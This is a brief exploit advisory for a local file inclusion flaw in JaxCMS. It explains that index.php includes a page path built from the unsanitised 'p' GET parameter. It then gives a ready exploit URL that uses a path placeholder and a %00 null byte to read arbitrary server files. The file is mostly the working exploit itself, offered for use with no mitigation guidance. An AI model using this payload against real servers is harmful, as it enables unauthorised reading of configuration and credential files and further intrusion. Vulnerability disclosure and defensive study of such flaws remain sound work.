20 lines
397 B
Text
Executable file
20 lines
397 B
Text
Executable file
/*
|
|
|
|
Name : JaxCMS (p) Local File Include
|
|
WebSite : http://www.pixiescripts.com/
|
|
|
|
Author : Hamza 'MizoZ' N.
|
|
Email : mizozx@gmail.com<mailto:mizozx@gmail.com>
|
|
|
|
Greetz : Zuka !
|
|
|
|
*/
|
|
|
|
The vulnerability is in the get $_GET['p'] , the index.php include '/pages/'.$_GET['p'].'.php'
|
|
|
|
So we can read any file in the server .
|
|
|
|
EXPLOIT :
|
|
|
|
http://server/[JaxCMS PATH]/index.php?p=[LFI]%00
|
|
|